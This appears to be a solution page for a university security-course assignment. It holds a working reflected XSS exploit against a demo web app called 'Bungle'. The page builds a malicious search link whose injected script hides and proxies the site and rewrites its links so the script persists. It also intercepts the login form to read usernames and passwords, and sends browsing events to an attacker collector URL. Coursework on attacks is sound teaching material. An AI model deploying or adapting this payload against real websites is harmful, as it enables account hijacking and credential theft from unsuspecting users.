<meta charset="utf-8"><script src="http://ajax.googleapis.com/ajax/libs/jquery

1. <meta charset="utf-8">
2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
3. <script>
4. function payload(attacker) {
5.  
6. function log(data) {
7. console.log($.param(data));
8. $.get(attacker, data);
9. }
10.  
11. function proxy(href) {
12. //TODO: modify displayed url
13.  
14. //TODO: push a modified page (that loads the script)
15. var stateObj = {
16. foo: href
17. };
18. history.pushState(stateObj, "page 2", href);
19.  
20. $("html").load(href, function() {
21. $("html").show();
22.  
23. // replace all links with proxy
24. $('a').each(function() {
25. console.log("replaced sth :D");
26. var value = $(this).attr('href');
27. $(this).attr('onClick', /*proxy.toString() + ';*/'proxy(\"' + value + '\")');
28. $(this).attr('href', '#');
29.  
30. });
31.  
32. //hijack login form
33. if ($('#log-in-btn').length) {
34. $('#log-in-btn').on("click", function(e) {
35. e.preventDefault();
36. var un = $('#username').val();
37. var pw = $('#userpass').val();
38.  
39. //TODO: log to attacker
40. console.log("btn clicked: " + un + ", " + pw);
41.  
42. $.ajax({
43. url: "./login",
44. data: {
45. username: un,
46. password: pw,
47. },
48. type: "POST",
49. success: function (data) {
50. $("html").html(data);
51. proxy("/");
52. }
53. })
54. })
55. }
56.  
57. // hijack search form
58. if ($('#search-btn').length) {
59. $('#search-btn').on("click", function(e) {
60. e.preventDefault();
61. var attr = $("#query").val();
62. $.ajax({
63. url: "./search",
64. data: {
65. q: attr
66. },
67. type: "GET",
68. success: function (data) {
69. $("html").html(data);
70. proxy("search?q=" + attr);
71. }
72. })
73. })
74. }
75.  
76. //TODO: modify logout button
77.  
78. log({
79. event: "nav",
80. uri: href
81. });
82. });
83. }
84. $("html").hide();
85.  
86. // load our script on the page
87. $(document).ready(function() {
88. var script = document.createElement('script');
89. script.text = "var attacker = '" + attacker + "';\n" + proxy.toString() + "\n" + log.toString();
90. document.body.appendChild(script);
91. console.log("ready");
92. });
93.  
94. proxy("/");
95. }
96.  
97. function makeLink(xssdefense, target, attacker) {
98. if (xssdefense == 0) {
99. return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<\/script" + ">");
100. } else { // Implement code to defeat XSS defenses here.
101. }
102. }
103. var xssdefense = 0;
104. var target = "http://cos432-assn3.cs.princeton.edu/";
105. var attacker = "http://127.0.0.1:31337/stolen";
106. $(function() {
107. var url = makeLink(xssdefense, target, attacker);
108. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
109. });
110. </script>
111. <h3>parse error</h3>